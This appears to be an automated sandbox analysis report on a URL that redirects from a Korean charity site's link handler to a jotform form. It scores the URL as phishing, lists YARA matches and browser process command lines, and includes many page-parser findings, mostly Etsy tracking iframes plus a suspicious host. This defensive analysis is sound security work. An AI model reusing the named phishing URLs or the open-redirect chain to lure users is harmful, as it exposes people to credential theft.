Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059

Overview

General Information

Sample URL:https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059
Analysis ID:1538488
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish44
Yara detected Phisher
Detected non-DNS traffic on DNS port
HTML body with high number of embedded SVGs detected
HTML page contains hidden javascript code
Invalid T&C link found
Stores files to the Windows start menu directory
Suspicious form URL found

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 4528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1948,i,10177410140254212354,15641448394801064498,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7092 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3156 --field-trial-handle=1948,i,10177410140254212354,15641448394801064498,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 --field-trial-handle=1948,i,10177410140254212354,15641448394801064498,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_735JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    dropped/chromecache_778JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
      dropped/chromecache_615JoeSecurity_Phisher_1Yara detected PhisherJoe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: dropped/chromecache_778, type: DROPPED
        Source: Yara matchFile source: dropped/chromecache_615, type: DROPPED
        Source: Yara matchFile source: dropped/chromecache_735, type: DROPPED
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Total embedded SVG size: 399540
        Source: https://v2nt.molouscre.com/wZoRh/HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none" viewBox="0 0 26 26"><path fill="#d9d9d9" d="M13 0a13 13 0 1 0 0 26 13 13 0 0 0 0-26m0 24a11 11 0 1 1 0-22 11 11 0 0 1 0 22"/><path fill="#d9d9d9" d="m10.955 16.055-3.95-4.125-1.445...
        Source: https://www.etsy.com/HTTP Parser: Invalid link: Privacy settings
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Invalid link: Privacy settings
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Invalid link: Privacy settings
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Invalid link: Privacy settings
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Invalid link: Privacy settings
        Source: https://www.etsy.com/HTTP Parser: Form action: /search.php
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Form action: /search.php
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Form action: /search.php
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Form action: /search.php
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Form action: /cart/listing.php
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Form action: /add_report.php
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Form action: /search.php
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Form action: /cart/listing.php
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Form action: /add_report.php
        Source: https://www.etsy.com/HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-KWW5SS
        Source: https://www.etsy.com/HTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_00;ord=1;num=9371495004602;npa=0;auiddc=2084024919.1729505276;u2=QVrcCcY9ItAhN5czrTjjfzhguMEe;ps=1;pcor=685437968;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
        Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_00;ord=1;num=9371495004602;npa=0;auiddc=2084024919.1729505276;u2=QVrcCcY9ItAhN5czrTjjfzhguMEe;ps=1;pcor=685437968;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
        Source: https://www.etsy.com/HTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_000;ord=1;num=3212989082534;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=1578851005;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
        Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_000;ord=1;num=3212989082534;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=1578851005;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
        Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/658194373?random=1729505278413&cv=11&fst=1729505278413&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101794736&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2F&ref=https%3A%2F%2Fv2nt.molouscre.com%2F&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Etsy%20-%20Shop%20for%20handmade%2C%20vintage%2C%20custom%2C%20and%20unique%20gifts%20for%20everyone&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&ct_cookie_present=0
        Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-KR3J610VYM&gacid=2035605285.1729505280&gtm=45je4ah0v868381678z86935543za200zb6935543&dma=0&gcs=G111&gcd=13t3t3t3t5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101686685&z=273940722
        Source: https://www.etsy.com/HTTP Parser: Iframe src: https://9910951.fls.doubleclick.net/activityi;src=9910951;type=remarkt;cat=unive0;ord=9610706358423;npa=0;auiddc=2084024919.1729505276;u2=%2F;u3=undefined;ps=1;pcor=1283930748;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
        Source: https://www.etsy.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=9910951;type=remarkt;cat=unive0;ord=9610706358423;npa=0;auiddc=2084024919.1729505276;u2=%2F;u3=undefined;ps=1;pcor=1283930748;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2F?
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-KWW5SS
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/995917074?random=1729505296371&cv=11&fst=1729505296371&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101836706&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue&hn=www.googleadservices.com&frm=0&tiba=Felt%20decor%20-%20Etsy&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D736202387%2C1610452380%2C1794576675%3Becomm_pagetype%3Dsearchresults%3Becomm_totalvalue%3D%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_000;ord=1;num=6682741059329;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=224793749;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_000;ord=1;num=6682741059329;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=224793749;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/658194373?random=1729505296451&cv=11&fst=1729505296451&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101794736&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Felt%20decor%20-%20Etsy&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&ct_cookie_present=0
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://9910951.fls.doubleclick.net/activityi;src=9910951;type=remarkt;cat=unive0;ord=5798595693344;npa=0;auiddc=2084024919.1729505276;u2=%2Fsearch;u3=undefined;ps=1;pcor=430800937;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=9910951;type=remarkt;cat=unive0;ord=5798595693344;npa=0;auiddc=2084024919.1729505276;u2=%2Fsearch;u3=undefined;ps=1;pcor=430800937;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-KWW5SS
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/995917074?random=1729505296371&cv=11&fst=1729505296371&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101836706&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue&hn=www.googleadservices.com&frm=0&tiba=Felt%20decor%20-%20Etsy&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D736202387%2C1610452380%2C1794576675%3Becomm_pagetype%3Dsearchresults%3Becomm_totalvalue%3D%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_000;ord=1;num=6682741059329;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=224793749;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_000;ord=1;num=6682741059329;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=224793749;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/658194373?random=1729505296451&cv=11&fst=1729505296451&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101794736&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Felt%20decor%20-%20Etsy&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&ct_cookie_present=0
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://9910951.fls.doubleclick.net/activityi;src=9910951;type=remarkt;cat=unive0;ord=5798595693344;npa=0;auiddc=2084024919.1729505276;u2=%2Fsearch;u3=undefined;ps=1;pcor=430800937;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
